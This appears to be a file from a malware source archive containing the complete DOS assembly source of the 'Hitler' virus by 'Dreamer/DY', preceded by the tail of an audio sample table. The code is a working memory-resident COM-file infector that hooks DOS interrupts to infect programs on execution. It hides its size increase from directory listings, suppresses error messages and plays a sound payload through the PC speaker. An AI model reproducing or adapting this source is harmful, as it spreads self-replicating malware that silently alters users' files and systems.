db 08Ah,0ABh,0ADh,0ACh,09Bh,0A5h,060h,067h,066h,059h,056h,06Fh,093h
db 08Fh,0BFh,0A8h,08Eh,0AFh,0AAh,044h,04Fh,070h,041h,057h,08Dh,084h
db 07Dh,0D1h,094h,07Eh,0BEh,088h,02Dh,06Ah,070h,038h,07Bh,0ABh,063h
db 0AFh,0A0h,068h,075h,0CDh,064h,013h,087h,068h,02Fh,0ABh,0B4h,037h
db 097h,0E0h,050h,097h,0F8h,022h,063h,0D4h,02Ah,07Dh,0E6h,038h,02Fh
db 0F9h,080h,047h,0E7h,0DAh,010h,07Fh,084h,034h,0B7h,0B0h,01Dh,035h
db 0D7h,0C0h,04Fh,0A1h,0B2h,002h,06Fh,0DEh,014h,087h,040h,001h,077h
db 0FFh,0A0h,032h,0BDh,0E2h,05Bh,0D7h,0C0h,000h,095h,02Ah,000h,0A7h
db 0C8h,02Ch,057h,0AEh,0C4h,09Fh,0E2h,030h,03Bh,0DCh,04Ah,02Fh,0FCh
db 084h,03Ah,0A5h,0D3h,094h,0BBh,0D8h,020h,07Fh,0A0h,018h,033h,0FFh
db 06Ch,009h,0A7h,0E2h,03Ah,0AFh,08Ah,000h,087h,068h,020h,09Fh,0D0h
db 040h,05Bh,0FFh,088h,03Fh,0D5h,01Ch,027h,0A0h,036h,04Fh,0FFh,0A8h
db 042h,0EFh,0D0h,05Eh,0F3h,0A0h,000h,05Bh,045h,03Dh,0F5h,0B4h,01Eh
db 057h,0FFh,060h,087h,0DCh,000h,007h,084h,04Ch,07Dh,0FFh,071h,02Dh
db 0FFh,0C4h,037h,0CFh,064h,000h,06Fh,038h,03Dh,0FFh,0C0h,034h,09Bh
db 0FFh,054h,0A3h,0C2h,000h,05Fh,050h,01Ah,09Fh,0FFh,050h,03Fh,0FFh
db 08Ch,073h,0F7h,034h,000h,07Ah,048h,073h,0FFh,080h,029h,0EFh,0D8h
db 02Eh,0ABh,068h,000h,08Dh,036h,028h,0F3h,0D8h,044h,08Fh,0FFh,04Ah
db 0AFh,0DAh,000h,02Bh,030h,03Fh,0D3h,0E8h,05Ah,07Fh,0FFh,068h,097h
db 0E2h,000h,00Bh,021h,03Fh,0A7h,0FFh,06Ch,063h,0FFh,078h,073h,0DFh
db 050h,000h,000h,04Dh,09Fh,0FFh,082h,033h,0E7h,0C0h,059h,0AFh,098h
db 000h,02Bh,03Fh,062h,0F1h,0A6h,073h,0DFh,0FFh,040h,08Bh,0D0h,000h
db 000h,017h,05Fh,0FDh,0FFh,058h,08Fh,0FFh,06Dh,0B7h,0ECh,008h,000h
db 027h,07Bh,0C6h,0D2h,075h,097h,0FFh,060h,076h,0C8h,018h,000h,000h
db 065h,0AFh,0FFh,096h,073h,0FFh,088h,07Fh,0DAh,040h,000h,000h,07Bh
db 09Fh,0E0h,082h,069h,0FFh,0D4h,05Fh,066h,080h,000h,027h,049h,062h
db 09Dh,0AAh,099h,0FFh,0F8h,038h,096h,0D4h,000h,000h,027h,077h,0FFh
db 0FCh,068h,09Fh,0FFh,065h,0AFh,0D8h,000h,000h,02Fh,09Ah,07Fh,088h
db 06Dh,0CFh,0FFh,062h,06Dh,0B1h,028h,000h,019h,065h,0BFh,0F4h,062h
db 08Bh,0FFh,084h,077h,0EBh,054h,000h,000h,05Dh,0AFh,0FFh,08Ah,057h
db 0FFh,068h,069h,0ABh,084h,000h,000h,065h,099h,0FFh,09Ch,05Bh,0EFh
db 0E4h,09Dh,093h,09Ah,000h,000h,07Fh,093h,08Eh,089h,06Ch,0E5h,0FFh
db 05Dh,074h,0CFh,038h,000h,023h,079h,09Bh,0DEh,091h,0AFh,0FFh,05Ch
db 073h,0A7h,084h,000h,000h,046h,09Fh,0FFh,080h,053h,0DFh,0E4h,077h
db 08Ah,0B8h,000h,000h,06Bh,089h,0A4h,084h,085h,0BFh,0FFh,050h,02Bh
db 0C7h,068h,000h,00Fh,055h,0B5h,0FFh,0D0h,014h,0CFh,084h,059h,0DDh
db 0C0h,000h,000h,08Fh,0B6h,0CBh,09Ah,050h,0D7h,0FFh,026h,055h,0A2h
db 008h,000h,03Bh,06Ch,08Ah,0D3h,094h,083h,0FFh,082h,091h,0E7h,060h
db 000h,00Ch,095h,082h,09Ch,0B3h,07Ah,0E7h,0FEh,028h,059h,0D7h,058h
db 000h,001h,03Fh,0BFh,0FFh,078h,063h,0FFh,086h,0B3h,0FFh,040h,000h
db 000h,06Dh,08Fh,0D9h,0A1h,060h,0B3h,0D2h,0C7h,074h,048h,000h,045h
db 04Bh,03Bh,097h,0B8h,0A2h,0D3h,0FFh,064h,071h,0CEh,004h,00Bh,01Bh
db 052h,07Bh,0C1h,0F6h,0A4h,0C5h,0C0h,065h,072h,0C6h,000h,000h,00Ah
db 03Fh,0DFh,0FFh,058h,06Bh,0FAh,044h,0A7h,0FFh,028h,000h,03Bh,0BDh
db 0FAh,0FFh,088h,07Bh,0FFh,058h,062h,057h,060h,000h,000h,043h,08Bh
db 0FFh,098h,06Ah,0E7h,0D0h,062h,08Ah,0B0h,000h,005h,05Fh,0B5h,0B2h
db 0A4h,072h,0D7h,0FFh,038h,087h,088h,01Ch,027h,053h,06Ah,09Dh,0FFh
db 070h,075h,0FDh,048h,063h,0C5h,080h,000h,015h,06Bh,0B7h,0FFh,084h
db 048h,0A7h,0E0h,061h,0B3h,088h,000h,031h,03Eh,062h,09Bh,0ECh,058h
db 05Bh,0FFh,054h,06Bh,0B5h,0A0h,000h,000h,061h,091h,0FFh,090h,043h
db 0EFh,0B8h,09Ah,09Fh,0A8h,000h,027h,031h,05Bh,09Ch,0BAh,0B0h,0BFh
db 0F5h,04Ah,07Fh,0E5h,042h,000h,000h,056h,0BBh,0FFh,090h,03Fh,0FFh
db 090h,0BFh,0D7h,094h,000h,000h,05Fh,08Eh,0FFh,080h,04Eh,0A5h,0D8h
db 07Fh,064h,094h,000h,000h,03Bh,088h,074h,068h,0BFh,0FBh,0FFh,04Ah
db 05Fh,0A5h,092h,015h,000h,01Fh,07Bh,0FFh,0FFh,052h,0DFh,050h,09Fh
db 0D3h,0C0h,000h,000h,053h,08Dh,0FFh,098h,036h,087h,0D4h,08Bh,06Dh
db 0B4h,000h,000h,035h,07Dh,0CBh,0F8h,0BAh,074h,0FFh,078h,075h,09Ah
db 050h,000h,000h,0AEh,082h,073h,0A6h,0B0h,0FFh,0C8h,03Bh,052h,099h
db 032h,000h,023h,044h,07Fh,0FFh,0FFh,058h,087h,046h,07Bh,0F3h,0CAh
db 000h,000h,05Fh,0CAh,0FFh,0FEh,024h,077h,0B8h,039h,076h,0B4h,00Eh
db 000h,02Bh,08Eh,0ABh,0FFh,070h,063h,0FFh,080h,09Ch,0BBh,054h,000h
db 00Fh,06Ah,0A5h,0D6h,09Ah,099h,0DDh,0D4h,056h,067h,094h,000h,000h
db 01Dh,066h,0BBh,0FFh,070h,067h,0D0h,06Fh,096h,0DEh,048h,000h,036h
db 06Fh,09Ah,0FFh,070h,027h,0C9h,056h,06Ch,08Fh,084h,000h,023h,057h
db 086h,0FFh,0F4h,080h,04Fh,0F5h,06Eh,082h,0C9h,020h,000h,003h,05Bh
db 099h,0FFh,0C0h,03Ch,0EBh,080h,08Fh,09Dh,0A8h,006h,00Eh,056h,077h
db 0DFh,0FFh,060h,07Fh,0B0h,06Eh,062h,0CEh,01Ah,017h,047h,05Dh,085h
db 0FFh,0FFh,040h,097h,05Ah,05Eh,06Fh,0B4h,000h,037h,050h,07Fh,0ABh
db 0FFh,0D8h,000h,0A7h,040h,047h,07Fh,08Ch,01Ch,023h,06Dh,080h,0C7h
db 0FFh,080h,019h,0D2h,030h,056h,09Fh,070h,018h,02Dh,086h,0A8h,0FFh
db 0FFh,070h,08Fh,0A0h,03Ch,018h,09Fh,070h,00Ah,053h,095h,099h,0FFh
db 0FFh,044h,08Bh,088h,02Dh,00Fh,0ADh,044h,006h,067h,0A2h,085h,0EBh
db 0FFh,030h,04Fh,094h,013h,000h,0BBh,035h,037h,083h,08Ch,093h,0FFh
db 0FFh,040h,06Dh,0A8h,023h,027h,0AFh,034h,047h,072h,092h,07Fh,0EBh
db 0FFh,054h,04Bh,0C0h,039h,044h,09Dh,054h,055h,075h,0C6h,084h,096h
db 0FFh,0A0h,033h,0BFh,04Ch,02Ch,056h,08Ah,055h,087h,0B3h,062h,051h
db 0C7h,0DCh,02Eh,08Fh,094h,020h,02Ah,07Dh,06Eh,0BDh,0ACh,06Ch,04Ch
db 0A3h,0FFh,080h,03Eh,0B3h,030h,02Ah,04Dh,08Eh,04Dh,095h,0A3h,06Ch
db 057h,0AFh,0FFh,060h,05Bh,0D5h,032h,04Fh,06Fh,064h,05Eh,0CDh,0A0h
db 03Ah,06Fh,0CDh,0C0h,04Ah,082h,0DBh,02Ch,06Dh,04Bh,04Eh,087h,0B8h
db 06Bh,058h,07Fh,09Eh,0CCh,072h,073h,0D5h,030h,06Fh,067h,048h,05Bh
db 0BAh,09Ch,058h,07Dh,099h,0D4h,094h,06Ch,0C3h,04Ch,079h,03Eh,025h
db 06Bh,0D4h,078h,072h,07Bh,07Ah,0BBh,0C1h,04Ah,08Bh,088h,02Bh,058h
db 034h,046h,0DDh,09Ah,080h,072h,06Ch,08Fh,0FFh,070h,013h,0B1h,030h
db 086h,055h,05Fh,0C7h,0B4h,082h,075h,087h,08Dh,0FFh,078h,000h,0A7h
db 058h,07Bh,070h,03Ah,05Bh,0BCh,08Eh,0A8h,0ACh,034h,08Fh,0D8h,028h
db 05Bh,0E0h,028h,07Fh,059h,029h,0ABh,0CCh,064h,06Bh,080h,049h,0AFh
db 0D0h,023h,07Fh,0B0h,00Eh,089h,061h,02Fh,0B7h,0B2h,070h,092h,088h
db 06Fh,0EFh,090h,023h,09Bh,0B4h,035h,08Ch,03Dh,03Fh,0D3h,094h,08Bh
db 0C7h,060h,03Bh,0B9h,082h,069h,0CFh,0A0h,027h,084h,02Ah,04Bh,0EFh
db 08Ch,07Eh,08Ch,050h,05Fh,0E3h,079h,04Fh,0AFh,078h,01Bh,081h,02Ch
db 03Dh,0D3h,078h,077h,0B3h,066h,055h,0BFh,082h,069h,0B2h,0A8h,025h
db 08Ah,035h,043h,0D3h,09Ch,07Bh,09Bh,05Ah,03Dh,0AFh,0C6h,07Fh,077h
db 07Fh,062h,06Ah,096h,05Dh,073h,0AAh,06Ah,08Ch,08Ah,054h,04Fh,08Eh
db 0AAh,07Bh,06Fh,09Ch,070h,05Dh,084h,056h,07Fh,0C5h,085h,073h,060h
db 05Ah,071h,0C3h,0A8h,050h,056h,064h,071h,087h,0ACh,04Bh,071h,088h
db 074h,0A4h,08Bh,085h,069h,072h,0A9h,090h,067h,07Ch,0A8h,038h,07Fh
db 088h,05Bh,07Fh,0A5h,06Ah,073h,0B9h,05Bh,056h,0B2h,05Ah,042h,0A2h
db 0CCh,044h,037h,079h,055h,073h,0E2h,0A5h,06Bh,091h,062h,056h,0B7h
db 0ACh,051h,05Fh,0A1h,090h,02Eh,0A3h,07Eh,045h,09Fh,0A2h,07Ch,095h
db 08Ah,070h,067h,0AEh,074h,055h,0A7h,0DBh,018h,033h,066h,06Ch,07Bh
db 0C3h,090h,049h,07Dh,093h,076h,0B3h,0B0h,041h,046h,0A3h,08Dh,02Ah
db 08Fh,075h,046h,087h,0B2h,07Bh,07Eh,091h,06Eh,071h,09Fh,08Ah,069h
db 070h,092h,08Ah,04Fh,096h,090h,056h,07Dh,090h,084h,07Dh,0A1h,086h
db 066h,084h,08Bh,073h,081h,080h,084h,072h,089h,082h,06Bh,06Eh,07Fh
db 080h,077h,079h,095h,091h,059h,059h,081h,070h,069h,08Bh,08Eh,088h
db 059h,07Ch,06Dh,097h,083h,06Eh,07Fh,087h,093h,087h,078h,05Ch,078h
db 098h,07Eh,077h,08Fh,097h,062h,067h,080h,066h,07Eh,0A1h,07Ah,07Dh
db 089h,095h,078h,055h,073h,092h,08Ch,077h,07Dh,096h,092h,04Ah,05Fh
db 06Eh,087h,092h,08Ch,082h,085h,092h,078h,058h,06Ch,092h,073h,073h
db 086h,08Eh,07Fh,05Eh,04Ah,06Ch,073h,092h,0A0h,07Eh,090h,097h,08Bh
db 073h,070h,078h,089h,089h,075h,079h,08Fh,08Eh,07Ah,040h,05Fh,07Ch
db 086h,085h,0A2h,0A9h,084h,07Fh,075h,05Ch,073h,09Ch,076h,061h,07Fh
db 079h,075h,092h,082h,031h,069h,086h,076h,09Fh,0B1h,07Eh,073h,092h
db 06Bh,067h,097h,087h,074h,078h,07Ah,085h,099h,065h,067h,088h,054h
db 069h,085h,084h,087h,0A3h,08Ch,078h,09Fh,086h,053h,067h,07Ch,068h
db 075h,092h,078h,072h,07Ch,062h,07Dh,0AFh,090h,06Bh,07Ch,06Eh,068h
db 08Fh,0A0h,078h,06Ah,072h,075h,08Dh,08Ch,07Eh,089h,072h,054h,072h
db 08Bh,089h,07Fh,072h,06Bh,08Ah,0A2h,089h,08Fh,085h,066h,071h,093h
db 088h,074h,078h,06Dh,070h,08Ah,088h,089h,08Dh,072h,06Bh,080h,078h
db 079h,070h,069h,06Ch,07Ch,08Bh,082h,08Bh,078h,06Ah,087h,081h,07Eh
db 08Eh,070h,05Fh,079h,085h,07Fh,087h,07Ah,05Fh,08Ah,0A4h,076h,079h
db 080h,06Ah,069h,075h,07Eh,093h,0A5h,081h,072h,088h,088h,085h,090h
db 078h,060h,071h,07Bh,07Fh,084h,07Ah,068h,07Ah,08Ch,07Fh,07Ah,070h
db 068h,076h,07Ch,077h,093h,0A2h,080h,086h,07Dh,07Bh,083h,08Eh,068h
db 064h,074h,06Eh,077h,097h,074h,068h,080h,080h,071h,08Bh,07Ch,059h
db 079h,08Ah,074h,099h,09Ch,066h,07Fh,0A6h,07Fh,08Fh,0A0h,056h,06Dh
db 0A2h,06Ch,07Dh,09Dh,060h,05Fh,098h,072h,063h,097h,088h,048h,07Dh
db 085h,069h,0A3h,088h,04Eh,063h,09Fh,091h,077h,08Ch,074h,042h,085h
db 09Ch,06Ch,095h,066h,051h,08Fh,0CFh,07Ah,073h,09Ah,080h,065h,097h
db 080h,05Ah,081h,04Ch,04Ah,09Eh,09Ch,074h,07Fh,083h,086h,097h,09Ah
db 069h,07Fh,08Ch,060h,06Fh,0A0h,077h,06Eh,08Ch,08Eh,07Dh,083h,083h
db 064h,07Ah,074h,05Eh,079h,09Fh,07Ah,063h,083h,092h,069h,091h,088h
db 052h,075h,070h,069h,08Fh,0A0h,06Bh,074h,0ABh,08Eh,062h,08Dh,066h
db 063h,08Ah,071h,07Bh,0BBh,098h,068h,087h,0A4h,077h,097h,08Ch,044h
db 056h,069h,071h,0A7h,094h,05Dh,05Eh,0A4h,07Ch,077h,08Eh,05Ch,04Dh
db 07Eh,074h,07Bh,0ACh,078h,059h,0A3h,0A4h,060h,082h,084h,049h,075h
db 081h,07Eh,0ADh,0A5h,071h,07Fh,0BAh,074h,071h,084h,04Ah,05Bh,073h
db 071h,087h,0ADh,07Ch,062h,0ADh,093h,073h,097h,06Ah,03Fh,070h,077h
db 07Bh,0B5h,088h,058h,08Bh,0A8h,061h,079h,080h,045h,06Eh,075h,071h
db 09Bh,0B2h,072h,06Bh,0B0h,080h,078h,096h,061h,042h,05Fh,073h,08Dh
db 0B4h,088h,068h,0A3h,096h,06Fh,08Dh,07Ch,04Ah,05Eh,06Ch,07Fh,0BBh
db 0A0h,070h,08Fh,0B0h,07Eh,07Fh,08Ah,040h,030h,063h,086h,0AFh,0ACh
db 066h,063h,0B3h,080h,07Ch,07Eh,04Ch,03Fh,059h,079h,096h,09Bh,084h
db 077h,0ADh,090h,071h,085h,080h,03Eh,041h,073h,093h,0D3h,0B2h,076h
db 091h,09Ah,083h,0A3h,090h,040h,038h,05Bh,08Ah,0A7h,088h,071h,086h
db 090h,06Bh,07Eh,083h,052h,043h,057h,08Bh,0BBh,0C0h,080h,07Fh,0AAh
db 068h,07Bh,094h,050h,030h,048h,076h,09Dh,0A6h,07Dh,072h,0A7h,07Ah
db 069h,07Ah,07Dh,054h,065h,06Ch,085h,0A9h,0AAh,095h,0B2h,09Ch,059h
db 089h,0A1h,04Ch,049h,060h,07Eh,0C3h,0C0h,080h,083h,0A9h,067h,07Bh
db 08Dh,060h,03Ch,05Ah,085h,081h,07Eh,079h,08Dh,0B3h,060h,05Bh,07Bh
db 064h,03Dh,053h,06Ch,093h,0B5h,090h,08Ah,0BBh,07Ah,06Fh,08Fh,076h
db 046h,05Fh,070h,087h,0B3h,08Ch,07Ch,0AEh,078h,059h,085h,07Eh,048h
db 050h,07Bh,09Dh,0C1h,0A1h,08Fh,09Fh,098h,073h,085h,07Ch,048h,055h
db 07Ah,083h,083h,08Bh,08Bh,0A0h,0A8h,068h,06Fh,087h,05Eh,04Ah,061h
db 083h,095h,0A1h,090h,08Fh,0A8h,068h,067h,07Fh,062h,03Ah,056h,06Eh
db 097h,0B3h,087h,076h,09Fh,096h,06Ah,083h,080h,043h,056h,07Eh,088h
db 087h,08Fh,090h,0ADh,0B4h,060h,066h,08Dh,06Dh,044h,05Ch,075h,096h
db 0CAh,08Ch,063h,098h,071h,079h,087h,078h,044h,04Bh,083h,097h,09Bh
db 08Ah,07Ch,09Eh,0ACh,061h,05Fh,07Fh,062h,04Ah,067h,08Ah,095h,0BBh
db 098h,08Ch,0BDh,084h,085h,091h,06Ch,045h,059h,085h,08Bh,095h,08Bh
db 083h,0A4h,08Ch,04Dh,06Ah,08Bh,060h,048h,05Eh,07Fh,0ADh,0CCh,07Ch
db 068h,09Ch,064h,083h,089h,054h,036h,04Fh,07Dh,096h,0AFh,088h,072h
db 086h,0A0h,08Bh,074h,05Bh,04Dh,073h,078h,087h,09Eh,09Dh,092h,0A5h
db 0BCh,076h,07Bh,085h,059h,055h,06Ch,081h,093h,0A7h,0A1h,07Bh,07Ch
db 084h,06Dh,07Ch,07Bh,042h,039h,057h,07Dh,0C5h,0ACh,05Ah,071h,092h
db 06Ah,08Ah,09Fh,061h,046h,06Eh,099h,0BBh,0ABh,076h,073h,0A4h,068h
db 069h,06Fh,061h,036h,04Dh,07Bh,09Fh,0D1h,0A2h,081h,0B2h,098h,07Eh
db 093h,086h,04Bh,04Dh,077h,08Dh,0A7h,092h,07Ah,09Dh,0A0h,057h,072h
db 07Ah,05Ch,063h,065h,06Fh,09Fh,0CDh,08Dh,074h,09Ch,060h,063h,089h
db 070h,035h,046h,070h,095h,0C6h,090h,061h,085h,094h,06Ah,07Fh,07Eh
db 04Ah,05Ch,066h,076h,0A5h,0BAh,090h,087h,0BAh,082h,07Eh,095h,086h
db 04Ch,054h,07Dh,09Eh,0C9h,0A0h,06Ch,093h,086h,065h,073h,078h,03Dh
db 058h,065h,06Fh,08Ah,0AAh,090h,094h,0A1h,055h,062h,08Bh,068h,03Eh
db 04Ch,06Ch,09Bh,0D8h,090h,06Eh,0ACh,086h,07Dh,092h,076h,044h,052h
db 073h,089h,0B9h,096h,06Eh,08Dh,0A2h,065h,06Dh,084h,04Ah,05Dh,079h
db 090h,085h,094h,0ADh,0BBh,0C4h,066h,062h,083h,08Eh,056h,054h,068h
db 07Bh,0BFh,0BCh,070h,082h,063h,06Eh,08Dh,085h,040h,04Ah,069h,085h
db 0BDh,090h,05Ch,075h,09Ah,073h,07Bh,088h,050h,053h,074h,087h,097h
db 0ADh,08Eh,085h,0B3h,080h,073h,07Bh,076h,048h,059h,098h,092h,088h
db 08Ch,099h,0B6h,0A8h,05Bh,064h,081h,05Ch,050h,058h,066h,085h,0BFh
db 0A6h,072h,082h,057h,077h,0A5h,07Ch,04Dh,062h,07Bh,092h,0CAh,088h
db 054h,095h,080h,069h,07Bh,080h,04Ch,059h,07Ah,092h,0B5h,0B0h,079h
db 08Dh,09Ah,07Fh,07Fh,084h,057h,056h,076h,091h,09Fh,0A2h,088h,08Ah
db 0A5h,06Ah,06Dh,075h,05Ch,049h,062h,079h,087h,0BEh,099h,066h,08Eh
db 076h,07Eh,08Bh,074h,04Dh,05Bh,077h,089h,0AFh,0A0h,061h,07Bh,082h
db 065h,077h,08Eh,068h,068h,073h,08Eh,0A6h,0CAh,08Dh,065h,087h,08Bh
db 084h,076h,07Ch,054h,063h,075h,08Ah,0ADh,0B5h,078h,077h,093h,06Fh
db 07Bh,086h,060h,05Dh,068h,07Ah,093h,0C5h,08Ch,055h,083h,069h,071h
db 076h,072h,056h,05Ch,06Bh,081h,0ADh,0C4h,080h,067h,07Ah,061h,077h
db 096h,07Ah,072h,06Dh,07Eh,095h,0C2h,0B8h,064h,06Fh,072h,069h,078h
db 09Ah,078h,06Eh,073h,087h,0A7h,0CEh,098h,050h,07Eh,073h,074h,07Dh
db 088h,062h,066h,07Fh,091h,09Fh,0C3h,080h,058h,07Eh,060h,065h,081h
db 078h,057h,05Fh,088h,08Ch,0A0h,0B5h,076h,057h,070h,058h,070h,094h
db 075h,05Ch,077h,09Ch,08Ah,0A3h,0B8h,068h,05Fh,08Ch,06Dh,06Ah,095h
db 07Bh,06Bh,085h,093h,08Ah,0AFh,0B0h,064h,05Fh,08Fh,063h,069h,08Fh
db 067h,063h,07Dh,08Ah,082h,0A9h,0A8h,05Eh,05Dh,08Ah,060h,06Ah,089h
db 074h,073h,07Fh,092h,07Ch,089h,0B3h,081h,05Fh,093h,072h,066h,07Ah
db 08Eh,07Eh,089h,094h,080h,07Eh,09Fh,098h,064h,088h,
slutt: ; DREAMER has a weird sense of humor
size equ $-100h
pgf equ ($+16)/16
MSDOS/H-Index/Virus.MSDOS.Unknown.hitler.asm
+701
View File
@@ -0,0 +1,701 @@
call rakett
old db !­'
rakett: pop bp
push bp
add bp,-103h
mov ax,42ABh
int 21h
jnc failed
cli
mov ax,3521h
int 21h
mov w [bp+offset old21],bx
mov w [bp+offset old21+2],es
mov al,1Ch
int 21h
cli
mov w [bp+offset old1C],bx
mov w [bp+offset old1C+2],es
mov w [bp+offset teller],16380
sti
call normalspeed
mov si,ds
std
lodsb
cld
mov ds,si
xor bx,bx
mov cx,pgf
cmp b [bx],'Z'
jne failed
mov ax,[bx+3]
sub ax,cx
jc failed
mov [bx+3],ax
sub [bx+12h],cx
mov es,[bx+12h]
push cs
pop ds
mov di,100h
mov si,bp
add si,di
mov cx,size
rep movsb
push es
pop ds
mov ax,2521h
mov dx,offset ni21
int 21h
mov al,1Ch
mov dx,offset ni1C
int 21h
failed: push cs
push cs
pop ds
pop es
pop si
mov di,100h
push di
movsw
movsw
movsb
mov cx,0FFh
mov si,100h
ret
findFCB: popf
call int21
pushf
or al,al
jnz backFCB
call stealth
backFCB: popf
iret
stealth: push ax
push bx
push dx
push es
mov ah,2Fh
call int21
cmp byte es:[bx],0FFh
jne normFCB
add bx,8
normFCB: mov al,byte es:[bx+16h]
and al,31
xor al,31
jnz shitFCB
mov ax,word es:[bx+1Ch]
mov dx,word es:[bx+1Ch+2]
sub ax,size
sbb dx,0
jc shitFCB
mov word es:[bx+1Ch],ax
mov word es:[bx+1Ch+2],dx
shitFCB:
pop es
pop dx
pop bx
pop ax
ret
ni21: pushf
cmp ah,11h
je findFCB
cmp ah,12h
je findFCB
cmp ax,42ABh
jne not_42AB
popf
clc
retf 2
not_42AB:
cmp ax,4B00h
jne not_4B00
call install_24
push ax
push bx
push cx
push dx
push ds
push bp
mov ax,4300h
call int21
jc back1
mov cs:old_attr,cx
test cl,4
jnz back1
mov ax,4301h
xor cx,cx
call int21
jc back1
push dx
push ds
call infect
pop ds
pop dx
mov ax,4301h
db 0B9h ;mov CX,...
old_attr dw 0
call int21
back1: ;go here if the attrib-get fails
pop bp
pop ds
pop dx
pop cx
pop bx
pop ax
call remove_24
not_4B00:
back: popf
db 0EAh
old21 dw 0,0
int21: pushf
call dword ptr cs:old21
ret
infect: mov ax,3D02h
call int21
jnc okay_open
bad1: ret
okay_open: xchg bx,ax
mov ax,5700h
call int21
push cx
mov bp,sp
push dx
mov ah,3Fh
mov cx,5
mov dx,offset old
push cs
pop ds
call int21
jc close
cmp al,5
jne close
cmp word old[0],'MZ'
je close
cmp word old[0],'ZM'
je close
cmp old[0],0E9h
jne infect1
cmp word old[3],'­!'
jne infect1
close: pop dx
pop cx
mov ax,5701h
call int21
mov ah,3Eh
call int21
ret
infect1: mov ax,4202h
xor cx,cx
xor dx,dx
call int21
or dx,dx
jnz close
cmp ax,59000
jae close
dec ax
dec ax
dec ax
mov word ptr putjmp[1],ax
mov ah,40h
mov cx,size
mov dx,100h
call int21
jc close
cmp ax,size
jne close
mov ax,4200h
xor cx,cx
xor dx,dx
call int21
mov ah,40h
mov cx,5
mov dx,offset putjmp
call int21
or byte ss:[bp],31
jmp close
putjmp db 0E9h
dw 0
db '!­'
install_24: pushf
cli
push bx
push ds
xor bx,bx
mov ds,bx
push ds
lds bx,[24h*4]
mov cs:old24[0],bx
mov cs:old24[2],ds
pop ds
mov word [(24h*4)],offset ni24
mov [(24h*4)+2],cs
pop ds
pop bx
sti
popf
ret
remove_24: pushf
cli
push bx
push es
push ds
xor bx,bx
mov ds,bx
les bx,cs:old24[0]
mov [(24h*4)],bx
mov [(24h*4)+2],es
pop ds
pop es
pop bx
sti
popf
ret
errflag db 0
db 'Hitler Virus by Dreamer/DY',0
ni24: mov al,3
mov cs:errflag,1
iret
old24 dw 0,0
xofs dw offset sample
len equ 4131
divisor equ 230
teller dw 16380
ni1C:
cli
pushf
push ax
push ds
push si
push cs
pop ds
cmp teller,0
je teller_ok
dec teller
jmp noreset
teller_ok:
mov al,34h
db 0E6h,43h ;out 43h,al
mov al,divisor
db 0E6h,40h ;out 40h,al
mov al,0
db 0E6h,40h ;out 40h,al
mov al,090h
db 0E6h,43h ;out 43h,al
mov si,xofs
lodsb
db 0E6h,42h ;out 42h,al
db 0E4h,61h ;in al,61h
or al,3
db 0E6h,61h ;out al,61h
inc xofs
cmp xofs,len+offset sample
jb noreset
mov xofs,offset sample
noreset:
sti
pop si
pop ds
pop ax
popf
db 0EAh
old1C dw 0,0
normalspeed: cli
push ax
mov al,34h
db 0E6h,43h
mov al,0
db 0E6h,40h
db 0E6h,40h
pop ax
sti
ret
sample:
db 080h,080h,080h,080h,080h,081h,080h,081h,081h,081h,081h,081h,083h
db 083h,083h,083h,083h,083h,083h,083h,083h,083h,081h,081h,081h,081h
db 080h,080h,080h,080h,080h,080h,080h,080h,080h,080h,065h,000h,000h
db 075h,08Ah,084h,083h,083h,089h,081h,081h,081h,07Ah,079h,07Ch,07Ah
db 07Bh,07Ch,07Fh,07Ah,078h,079h,07Fh,07Bh,07Fh,07Dh,07Bh,07Ah,07Fh
db 083h,08Ah,08Ch,088h,08Ah,085h,083h,089h,08Bh,080h,082h,07Fh,081h
db 07Fh,082h,081h,08Bh,07Ah,074h,07Ch,07Eh,080h,07Fh,07Fh,083h,07Fh
db 084h,082h,083h,080h,083h,081h,07Dh,07Eh,080h,083h,083h,07Dh,079h
db 07Fh,084h,080h,07Bh,07Dh,07Fh,07Fh,07Ch,07Ah,07Dh,083h,081h,07Fh
db 082h,080h,07Bh,07Fh,08Ah,08Bh,086h,085h,086h,083h,089h,089h,086h
db 084h,07Dh,07Ch,07Eh,085h,086h,085h,086h,083h,081h,088h,087h,080h
db 07Dh,081h,083h,081h,080h,07Ch,07Eh,076h,075h,07Bh,07Ah,075h,072h
db 075h,06Fh,074h,07Eh,080h,07Fh,07Fh,07Fh,083h,087h,085h,084h,08Ah
db 08Bh,086h,087h,08Ah,08Ah,08Ah,081h,081h,089h,084h,081h,07Ch,086h
db 083h,084h,082h,07Fh,082h,07Fh,087h,086h,082h,080h,076h,07Ch,07Bh
db 07Bh,082h,07Dh,07Eh,07Ah,07Fh,07Eh,085h,084h,082h,084h,07Eh,088h
db 07Fh,088h,07Eh,07Fh,07Dh,077h,07Ch,075h,07Dh,078h,07Bh,079h,07Fh
db 080h,084h,088h,081h,083h,087h,084h,087h,082h,089h,08Bh,08Fh,08Dh
db 08Bh,087h,080h,083h,081h,08Ch,07Ah,082h,076h,07Fh,07Bh,07Ah,07Ah
db 07Ch,077h,072h,077h,07Ch,07Fh,080h,07Eh,07Bh,07Dh,07Ah,080h,07Ch
db 07Eh,076h,082h,082h,08Dh,089h,084h,085h,085h,086h,087h,089h,086h
db 085h,08Ch,087h,090h,085h,07Ch,082h,083h,087h,07Ch,088h,07Bh,074h
db 091h,085h,09Bh,086h,086h,070h,076h,079h,08Dh,080h,06Bh,063h,069h
db 07Dh,067h,04Ch,081h,07Ah,0ABh,0A8h,09Ch,08Eh,060h,056h,07Fh,088h
db 089h,075h,094h,08Ch,013h,092h,040h,0D7h,0B0h,097h,0C4h,036h,057h
db 082h,0CBh,0C5h,09Dh,0C8h,00Dh,0A5h,026h,0A7h,072h,06Bh,0E0h,032h
db 089h,07Ah,0A7h,0E4h,0D7h,048h,07Fh,034h,07Bh,054h,06Fh,0B6h,02Bh
db 06Ah,055h,0ABh,0C0h,032h,09Fh,074h,06Fh,0A4h,043h,0B6h,040h,087h
db 090h,095h,0FFh,060h,015h,074h,039h,0E0h,044h,0D7h,080h,027h,0C9h
db 070h,0E7h,0F8h,025h,0AEh,009h,0ABh,050h,067h,0ACh,01Ch,0E3h,068h
db 09Fh,0FFh,02Fh,0CEh,014h,09Fh,080h,023h,0C4h,056h,0D3h,075h,0AFh
db 0F4h,035h,0A8h,000h,077h,040h,000h,09Ch,05Bh,0BBh,078h,0EBh,0D4h
db 07Fh,0A8h,007h,0BDh,032h,04Dh,092h,087h,0D4h,08Dh,0FFh,070h,0D7h
db 04Ch,06Bh,08Ch,01Ah,08Fh,078h,092h,087h,0CFh,0E8h,06Fh,0A0h,000h
db 0A5h,01Ch,007h,069h,073h,0B0h,07Fh,0FFh,068h,0D1h,028h,067h,070h
